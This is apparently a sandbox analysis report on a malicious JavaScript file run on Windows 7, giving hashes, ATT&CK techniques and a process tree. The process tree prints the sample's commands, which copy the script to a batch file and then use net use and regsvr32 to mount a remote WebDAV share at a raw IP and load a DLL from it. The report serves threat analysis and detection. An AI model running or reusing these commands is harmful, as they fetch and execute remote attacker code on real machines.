964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
10/07/2024, 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74.js
Size

5KB
MD5

e3a66e92100d2eb5e0f9b1e707cbc3ab
SHA1

02b8d4f1fda5f5da5d4bf6f4e3ad5a2b9a18dae0
SHA256

964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74
SHA512

9c1e5a4d62320b5bd2d06a035ae9c31f859fb23ea3b0abb2ea51fff53def99dd8fd791cee7a182ea29db8757c8c4e4ee02518dd91fb345bd973db26d4940f150
SSDEEP

96:OZ9wDG6R5L8tJrWs5ueg40dBQTUJaFFXLwToviBJXYirtdlsiBOXdJykYZ:d/fDBeIQUJaxLgJRR+6kG

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2464	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 2780	2624	wscript.exe	30
PID 2624 wrote to memory of 2780	2624	wscript.exe	30
PID 2624 wrote to memory of 2780	2624	wscript.exe	30
PID 2780 wrote to memory of 2504	2780	cmd.exe	32
PID 2780 wrote to memory of 2504	2780	cmd.exe	32
PID 2780 wrote to memory of 2504	2780	cmd.exe	32
PID 2780 wrote to memory of 2464	2780	cmd.exe	33
PID 2780 wrote to memory of 2464	2780	cmd.exe	33
PID 2780 wrote to memory of 2464	2780	cmd.exe	33
PID 2780 wrote to memory of 2464	2780	cmd.exe	33
PID 2780 wrote to memory of 2464	2780	cmd.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74.js" "C:\Users\Admin\\kkhulc.bat" && "C:\Users\Admin\\kkhulc.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:2504
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\895.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\kkhulc.bat

Filesize
5KB

MD5
e3a66e92100d2eb5e0f9b1e707cbc3ab

SHA1
02b8d4f1fda5f5da5d4bf6f4e3ad5a2b9a18dae0

SHA256
964a6b1c5ada285bd8ea030c3f6ca8c97c7a6b4705504e833714180a1df7df74

SHA512
9c1e5a4d62320b5bd2d06a035ae9c31f859fb23ea3b0abb2ea51fff53def99dd8fd791cee7a182ea29db8757c8c4e4ee02518dd91fb345bd973db26d4940f150

Download Submit